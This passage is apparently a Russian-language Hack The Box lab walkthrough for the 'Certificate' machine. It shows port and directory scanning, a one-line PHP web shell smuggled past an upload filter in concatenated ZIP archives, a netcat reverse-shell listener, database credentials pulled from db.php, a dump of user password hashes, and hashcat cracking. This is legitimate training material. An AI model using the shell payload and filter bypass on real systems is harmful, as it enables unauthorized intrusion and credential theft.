Се­год­ня я покажу, как исполь­зовать при­виле­гию SeManageVolume для получе­ния «золото­го сер­тифика­та» и зах­вата домена на Windows. Перед этим нас ждет череда дру­гих уяз­вимос­тей: мы заг­рузим скле­енные ZIP-архи­вы на сайт, что­бы обой­ти филь­тр, получим шелл, вытащим учет­ки из базы дан­ных, про­ана­лизи­руем тра­фик для ата­ки на Kerberos и при­меним тех­нику ESC3 AD CS.

На­ша конеч­ная цель — получе­ние прав супер­поль­зовате­ля на машине Certificate с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — слож­ный.

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.71 certificate.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ска­нер нашел 13 откры­тых пор­тов:

  • 80 (HTTP) — веб‑сер­вер Apache 2.4.58;
  • 88 — Kerberos;
  • 135 — Microsoft RPC;
  • 139 — NetBIOS, NetLogon;
  • 389 — LDAP;
  • 445 — SMB;
  • 464 — служ­ба сме­ны пароля Kerberos;
  • 593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;
  • 636 — LDAP с шиф­ровани­ем SSL или TLS;
  • 3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;
  • 3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;
  • 5985 — WinRM;
  • 9389 — веб‑служ­бы AD DS.

До­бав­ляем имя кон­трол­лера домена в файл /etc/hosts.

10.10.11.71 certificate.htb dc01.certificate.htb

На хос­те работа­ет веб‑сер­вер, поэто­му сра­зу прос­мотрим сайт.

Главная страница сайта
Глав­ная стра­ница сай­та
 

Точка входа

На сай­те мож­но зарегис­три­ровать­ся, обя­затель­но сде­лаем это, что­бы иметь мак­симум воз­можнос­тей.

Регистрация пользователя
Ре­гис­тра­ция поль­зовате­ля

На сай­те ничего инте­рес­ного най­ти не уда­лось, поэто­му прис­тупим к ска­ниро­ванию катало­гов при помощи feroxbuster.

Справка: сканирование веба c feroxbuster

Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch, DIRB или ffuf. Я пред­почитаю feroxbuster.

При запус­ке ука­зыва­ем сле­дующие парамет­ры:

  • -u — URL;
  • -d — глу­бина ска­ниро­вания;
  • -t — количес­тво потоков;
  • -w — сло­варь (я исполь­зую сло­вари из набора SecLists).

За­даем все парамет­ры и запус­каем ска­нер:

feroxbuster -u http://certificate.htb/ -d 1 -t 128 -w php_files_common.txt
Результат сканирования каталогов с помощью feroxbuster
Ре­зуль­тат ска­ниро­вания катало­гов с помощью feroxbuster

На­ходим инте­рес­ные стра­ницы вро­де db.php, которая говорит об исполь­зовании базы дан­ных, а так­же upload.php — для заг­рузки фай­лов. Но сама стра­ница тре­бует допол­нитель­ные парамет­ры.

Содержимое страницы upload.php
Со­дер­жимое стра­ницы upload.php

Ос­матри­ваем­ся на сай­те и находим стра­ницу с кур­сами. При перехо­де к опре­делен­ному кур­су появ­ляет­ся стра­ница с фор­мой заг­рузки фай­ла.

Страница курса
Стра­ница кур­са
Форма загрузки файла
Фор­ма заг­рузки фай­ла
 

Точка опоры

Файл при­нима­ет офис­ные докумен­ты и ZIP-архи­вы. При попыт­ке заг­рузить на сер­вер веб‑шелл в архи­ве получа­ем ошиб­ку с помет­кой о вре­донос­ном кон­тенте.

Ответ сервера
От­вет сер­вера

Од­нако мож­но вос­поль­зовать­ся тех­никой объ­еди­нения архи­вов, при которой два архи­ва будут записа­ны под­ряд в одном фай­ле. Про­верять­ся будет пер­вый архив, а фай­лы получим из вто­рого.

# <?=`$_GET[0]`?>
echo -n qweqwe > file.pdf
zip file.zip file.pdf
zip shell.zip shell.php
cat file.zip shell.zip > all.zip
Результат загрузки файла
Ре­зуль­тат заг­рузки фай­ла

При прос­мотре в адресной стро­ке видим путь к фай­лу.

Путь к файлу
Путь к фай­лу

Те­перь вмес­то file.pdf ука­зыва­ем свой реверс‑шелл shell.php и коман­ду whoami.

Результат выполнения команды whoami
Ре­зуль­тат выпол­нения коман­ды whoami

За­пус­каем лис­тенер:

rlwrap nc -nlvp 4321

И выпол­няем реверс‑шелл, что­бы получить удоб­ную коман­дную обо­лоч­ку. Получа­ем сес­сию от име­ни учет­ной записи xamppuser.

Сессия пользователя xamppuser
Сес­сия поль­зовате­ля xamppuser
 

Продвижение

 

Пользователь Sara.B

Веб‑при­ложе­ние исполь­зует базу дан­ных, и в фай­ле db.php лежат учет­ные дан­ные от нее — без проб­лем получа­ем их.

Содержимое файла db.php
Со­дер­жимое фай­ла db.php

В XAMPP вхо­дят ути­литы для работы с базами дан­ных MySQL, можем ими вос­поль­зовать­ся.

Содержимое каталога xampp
Со­дер­жимое катало­га xampp

Пер­вым делом получим спи­сок баз дан­ных.

mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "show databases;"
Базы данных
Ба­зы дан­ных

Пер­спек­тивнее все­го выг­лядит certificate_webapp_db. Зап­рашива­ем спи­сок таб­лиц этой базы дан­ных.

mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "use certificate_webapp_db; show tables;"
Таблицы в базе certificate_webapp_db
Таб­лицы в базе certificate_webapp_db

В таб­лице users, ско­рее все­го, лежат учет­ные дан­ные поль­зовате­лей. Пос­мотрим поб­лиже.

mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "use certificate_webapp_db; select * from users;"
Содержимое таблицы users
Со­дер­жимое таб­лицы users

Сох­раним хеши поль­зовате­лей, у которых поч­та на домене certificate.htb, и проб­рутим с помощью hashcat.

hashcat -m 3200 hashes.txt rockyou.txt
Результат подбора пароля
Ре­зуль­тат под­бора пароля

У нас один пароль, поэто­му получим спи­сок поль­зовате­лей домена и сох­раним в файл.

net users /domain
Пользователи домена
Поль­зовате­ли домена

